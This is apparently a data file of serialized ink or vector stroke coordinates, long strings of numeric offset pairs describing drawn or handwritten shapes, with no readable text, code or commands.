0-1,1 0 1,-1 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1 0,0 0-1,1 0 1,-1 0-1,0-1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,1 1 1,-1 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,7-3 2670,4 32 1963,0 16-2371,-11 141-680,11-148-1626,-12-37-54,1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,1-1 0,-1 1 1,0 0-1,1 0 0,-1 0 0,1-1 0,-1 1 1,1 0-1,0 0 0,-1-1 0,1 1 0,-1-1 1,3 2-1,-3-2-59,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 1,-1 0-1,1-1 1,-1 1-1,1 0 1,0-1-1,-1 1 0,0 0 1,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 0,0-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1-1,1-1 0,-1 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,1-48-6864,-1 32 3802,0-1 42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7 432,'-6'-5'9739,"17"4"-6490,-5 6-3282,-5-3-282,0 0 0,0 0 0,0 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,0-1 0,-1 1 1,1-1-1,0 0 0,0 0 0,0 0 0,3 1 1,8 7-4610,-11 1 2054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7 952,'0'0'64,"0"0"1,-1 0-1,1 0 0,0-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 1,0 0-1,0-1 0,1 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,5 12 3311,-5-5-2844,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,4 11 0,6 25 701,-9-37-1094,-1 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,-1-1 1,1 1-1,-1 0 0,-1 0 1,1 0-1,-1-1 0,-3 9 1,-6 17 361,7-16-200,4-15-292,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1-1,1 0 1,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-2 1 0,1 0 122,-2 2 189,0 0 0,0 0 0,0-1 0,-1 1 0,1-1 1,0 1-1,-6 1 0,7-3-125,13 16 159,-11-16-305,-2 18 51,1-17-91,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 3 0,0-5 298,9-19 551,-8 17-845,0-1 1,0 1-1,-1 0 0,1-1 0,-1 1 0,1 0 1,-1-1-1,0 1 0,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,-1-2 0,0 1-11,1 1 0,0-1 0,0 1-1,-1 0 1,1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0-1-1,2-1 1,29-49-434,-27 47 478,-1 1-1,0-1 1,-1 0 0,1 0-1,-1 0 1,4-9-1,17-23 114,-5 11-150,-17 22-6,0 1 1,1-1-1,-1 1 0,1 0 1,-1-1-1,1 1 0,0 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 1-1,1 0 0,0 0 1,-1 1-1,7-3 0,43-18-98,-48 21 95,0 0 0,0 1 0,-1-1 1,1 1-1,0 0 0,0 1 0,0-1 0,-1 1 1,1 0-1,0 0 0,7 3 0,-6 2 1,0 0-1,-1 0 0,0 1 0,0 0 1,-1 0-1,0 0 0,0 0 1,0 1-1,2 9 0,-3-10-8,-1 0 9,-1 0 1,0 0-1,0 1 1,0-1 0,-1 0-1,0 1 1,-3 11-1,2 8 22,-10 34-26,11-53-11,0-6 10,0 0 0,-1 1-1,1-1 1,1 1 0,-1-1-1,0 1 1,0-1 0,1 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1-1,0 0 1,2 3 0,0 10-131,-3-15 111,0 0-1,0 0 1,0 1 0,0-1 0,-1 0 0,1 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,0 1 0,1-1-1,-1 0 1,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 0 0,0 1 0,0-1-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,1-48-13839,-2 36 10360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 24,'0'0'43,"13"-6"545,-9 6-105,-4 0-369,1 0 0,-1-1 0,1 1 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,11 7 9711,-25-3-5506,-5 11-2831,18-13-1490,-1 0 0,1-1 0,-1 0-1,1 1 1,-1-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0-1 1,-4 2 0,-26 27 628,30-28-585,1 10 56,-3-9-143,3-2 58,1 0 0,0 1-1,-1-1 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 253,0 0-260,0 2 7,0 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0-1 1,1 1-1,2 4 0,-2-5-22,1 1 1,-1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0 1-1,0-1 0,-1 0 1,1 1-1,0 4 1,1-6 4,-2-2 5,1 0-1,-1 0 0,0 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,0 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 1 0,1-1 0,-1 0 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,0 1 0,0-1 0,0 0 1,1 1-1,-1-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,1 4 11,8 4 2,11 11 34,-16-14-66,-3-5 18,-1-1 0,0 1 0,0 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,1 0 0,60 13-44,-60-13 54,32-5 57,96-64 156,-128 68-222,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1-2 0,10-14-20,-6 0 110,-4 18-85,-1 1 1,1-1 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 0 1,0 1 0,1-1-1,-1 1 1,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,-1 1 1,1-1 0,0 1-1,0-1 1,-1 0 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 1-1,0-1 1,-3-19 324,1 18-323,-1-1 0,1 1 1,-1-1-1,1 0 0,0 0 0,0 0 0,-3-5 1,-15-11 119,7 10 112,11 7-198,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1 0 0,-5-1 1,-140 7-10,147-6-45,-31 14-164,27-8 51,0 1 0,0 0 0,1 1 0,0-1 0,-5 11 0,4-7-462,-11 20-2805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7:56:4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7 388,'0'0'1106,"21"-5"1332,-9 5 2677,-12-1-5096,-1 1 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 54,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,-7 9 847,6-8-889,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1 0-1,-1-1 1,1 1-1,-1 2 1,-9 25 448,10-26-470,-1-2-4,1 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,1-1 0,-1 1 0,0 0 0,1 0-1,-1-1 1,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,1 0 0,-2 0-1,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,0 1 0,0-1 1,0 0-1,0 1 0,1-1 0,-2 0 0,1 1 1,0-1-1,0 1 0,0-1 0,-1 0 0,0 2 0,1-2 7,0 1-1,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,0 0 1,0-1 1,-1 0 1,1 1-1,0-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 0-1,1 0 1,-1 1-1,0-1 0,0 0 1,0 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 1,-1 2-1,-3 22 126,0-19-109,-2 7 12,6 24 293,-5-26-427,-1 2-64,6 119 616,-3-131-429,3-1-28,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,0 0 1,0 1-1,0-1 0,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 1,0 1-1,0 4 6,0-5-3,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-2 0 0,0 0 24,2 3-22,0-2-6,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1 1,-1 0-1,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,-13 18 1165,-26-11-972,39-7-179,-43 12 448,32-18 620,11 6-1067,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0-1-1,0 1 1,0-1 0,1 1-1,-1-1 1,0 1 0,0-1-1,-1-1 1,-7-3 197,7 5-128,1-1-61,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,0 0 0,-1-1 0,1 0-22,2-3 0,0 3-6,-13-11-2713,10 10 917,-17-8-3146,13-8-5977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2:5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20 457 472,'0'0'16252,"-19"-13"-13270,81-35-2742,-42 36-246,-2 0 0,31-26-1,5-2-50,-1-3 77,-23 23-5,7-9-9,17-7-146,-48 29 144,1 0 0,0 1 1,0 0-1,16-10 0,-8 0-36,-15 15 33,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,1 1-1,13-7 132,-12 5-131,1 0 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 1,-1 0-1,6-7 1,11-8-21,-18 18 19,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 0 0,-1 1 0,1-4 0,1 4 6,8-2 0,-11 1-3,1 1 20,-11 0 119,11 2-188,-1 12-60,-3-7 104,1 0-1,1 0 0,-1 0 0,1 1 0,0-1 0,1 1 0,0-1 0,-1 11 0,2 0-146,1-5 163,-1 0-1,-1-1 1,0 1-1,0 0 0,-6 21 1,5-23 8,0 0 1,1 0-1,0 1 1,1-1-1,0 0 1,2 18-1,0 10 0,9 23-2,-11 155 762,0-215-778,9-8-4025,-13 5 3638,-23-12-12587,17 13 9823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3:3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6 856,'13'-2'11873,"-3"-1"-9031,-6 3-2008,0 0-1,-1-1 1,1 1 0,0 1 0,0-1 0,-1 1-1,1-1 1,5 3 0,4 2-1110,-25-3-7370,5-2 5032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9:14:05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0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11 165 720,'0'0'2264,"0"7"522,0-8-2129,0-7 2139,1 8-2634,-1-1-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 0 0,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,0 0 1,1-1-1,-2 1 1,0 0 547,5-5-608,0 1-1,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,6-4 0,51-40-78,-34 28-23,-20 14 0,1 1 0,0 0 0,0 0 0,10-5 0,-17 9 3,1 1 0,-1-1 0,1 1 1,0-1-1,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,2 2 1,24 14 31,7 3 66,-23-11-87,-10-8-15,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 3 0,10 37-19,-12-33 30,-1 0 0,1 0 0,-1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 8 0,-9 25 17,8-23-20,-1-1-1,0 0 1,-1 0 0,-1-1-1,-1-1 1,0 0-1,-29 24 1,-32 14 7,30-34-40,21-11 52,25-22-1,2-2-28,1 9 3,1 0 0,-1 0 0,1 0 0,0 1 1,0 0-1,1 0 0,0 0 0,8-5 0,-1 1 61,-12 8-56,0 1 1,0-1 0,-1 1 0,1-1 0,0 1-1,0-1 1,-1 1 0,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0 0,1 1-1,0-1 1,0 1 0,-1-1 0,1 1 0,0-1-1,0 1 1,-1-1 0,1 1 0,0 1 0,21 10-62,1 0 1,1-2 0,26 9 0,-36-15 59,0-1-1,1-1 1,-1 0 0,26 0-1,-19 4-663,-14-2-3155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0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1476,'0'-3'1769,"0"-10"3704,9 0-2929,10 6 1569,-9 6-5700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1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 1008,'-9'-1'7313,"7"1"-6903,12 26 974,-9-24-1219,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,-1 4-1,11 25 1511,0 11 198,-22 18-797,5-34-815,6-24-248,-1-1-1,0 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,1 1 0,-1-1 1,1 1-1,-1-1 1,1 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,1 1 1,3 11 48,-5-14-54,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,14 12-523,-15-12 479,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 0 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0 187 556,'1'-4'554,"1"-1"-1,-1 1 0,1 0 1,0-1-1,0 1 1,0 0-1,0 1 1,1-1-1,0 0 1,5-5-1,9-15 1199,-13 19-1493,1 0 1,0 0-1,-1 1 0,2-1 0,-1 1 0,0 0 1,1 1-1,0-1 0,0 1 0,12-5 0,29-19 998,-38 22-1048,0 0 0,1 0-1,0 1 1,0 1 0,0-1 0,0 2 0,0-1 0,1 1 0,-1 1-1,18-1 1,-23 3-187,-1-1 0,0 1 0,0 1 0,0-1 0,1 0 0,-1 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1-1,-1 0 1,0 0 0,0 0 0,0 0 0,3 4 0,-3-1 42,0 0 0,-1-1 0,0 1 0,0 0 0,0 0-1,-1 0 1,1 0 0,-1 0 0,-1 0 0,1 1 0,-2 6 0,1-10-24,-1 1 0,0-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 1,-1-1-1,-4 2 0,-13 17 45,14-15-87,-1 0-1,1-1 1,-1 0 0,0 0 0,0 0 0,-16 6-1,12-4 24,9-6-17,0 0 8,-1 1 0,1 0 1,-1 0-1,1-1 1,-1 1-1,0-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 0-1,-6-1 1,-3-4 44,11 6-31,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-2-1,1 2 74,33 14 70,-25-12-55,0 1 0,0 0 1,1 1-1,-2 0 0,1 1 0,0-1 0,13 10 1,-12-8-52,27 19 316,-28-18-265,1-1 0,-1 1-1,1-1 1,0-1 0,0 0-1,11 4 1,-6-3 104,-1 1-1,1 1 0,-1 0 1,0 1-1,-1 0 0,0 1 1,11 11-1,44 29 609,-66-49-857,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 0-1,0-1 1,0 1 0,2-1-1,3-4-1554,-11-1-3474,3-12-5264,2 10 5839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86 189 464,'33'-11'3716,"-20"6"-3413,0 0-1,-1-1 1,1 0-1,-1-1 1,0 0-1,-1-1 1,0 0-1,0-1 1,0 0 0,10-13-1,-19 20-105,0-1 1,0 1-1,0 0 0,0-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-2-6 1,0 7 37,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,-4-1 0,-4 2-85,0 0 0,0 1 1,0 0-1,0 1 0,0 0 0,0 0 1,0 1-1,0 0 0,1 1 0,0 0 0,0 0 1,0 1-1,0 1 0,1-1 0,0 1 0,-13 13 1,-3 5 215,19-20-333,1-1 0,0 1-1,0 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 1-1,-1-1 1,1 1 0,0-1 0,0 7-1,1-11-27,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 1-1,1-1 1,0 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,1 1-1,1 0 1,42 14 67,-25-9-44,-4-2-35,1-1-1,-1-1 1,0 0 0,1-1 0,0-1-1,24-3 1,11 0-343,14 3-2659,-26 0-5925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4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78 124 104,'0'0'94,"0"-1"0,0 1 0,0 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,-42 17 4517,41-16-4430,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 3 0,0-2-168,1-1-1,-1 0 1,1 0-1,0 0 1,0 1-1,-1-1 1,2 0-1,-1 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,3 3-1,-1-1-6,1 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 0-1,1-1 1,-1 0 0,1 0-1,-1-1 1,1 0 0,0 1-1,-1-2 1,1 1 0,-1-1-1,1 0 1,-1 0 0,9-3 0,-4 1-3,-1 0 1,1-1 0,-1-1 0,0 1-1,-1-1 1,1-1 0,-1 0 0,0 0-1,0 0 1,10-13 0,-6 7-1,10-18 4,-13 15 27,-7 13-29,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 1,0 0-1,0-4 0,0 4 37,1-1-1,-1 1 1,0-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1-1,0 1 1,0-1-1,1 1 1,-1 0-1,-1-1 1,1 1 0,0 0-1,0-1 1,-1 1-1,0 0 1,1 0-1,-5-3 1,3 2 50,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,-5 0 0,0-1-23,0 2-1,1-1 0,-1 2 1,1-1-1,-1 1 1,1 0-1,-14 8 1,20-9-68,1 0-1,-1 0 1,1 1 0,-1-1-1,1 1 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,1 0 1,0 0 0,-1 0 0,1 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,0-1-1,1 5 1,-1-7-1,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1-1 0,3 2 0,28 10 34,-24-11-35,0 0 0,-1-1 1,1 1-1,0-2 0,0 1 1,0-1-1,0 0 0,0-1 1,0 0-1,-1 0 0,15-7 1,21-4 5,-43 13-3,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,-1 1 0,1-1 0,0 0-1,0 1 1,0-1 0,-1 1-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1 0-1,-1-1 1,1 1 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0 0 0,-1 2 0,2 52 408,-2-40-196,2-6-145,1 1 0,0-1-1,0 0 1,1 0 0,0 0-1,1 0 1,0-1 0,0 1 0,1-1-1,0 0 1,9 11 0,21 41 448,-24-43-436,-10-15-102,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,-1 1 0,0 0 0,1 4 0,2 10-735,-3-17 654,1 1 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,0 1 0,-1 0-1,-2 9-2796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49 112,'9'-14'2702,"-7"9"1123,-12-12 4179,3 8-6911,12 6-362,-4 52-10,0-45-699,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,0-1 0,0 1 0,0 0 0,-3 3 1,4-3-10,-1 0 1,0 1-1,1-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,1 0-1,0 1 1,2 3-1,2 25 44,-5-20-17,0-11-40,-1-1 1,1 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,1 2 1,-2-3-163,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 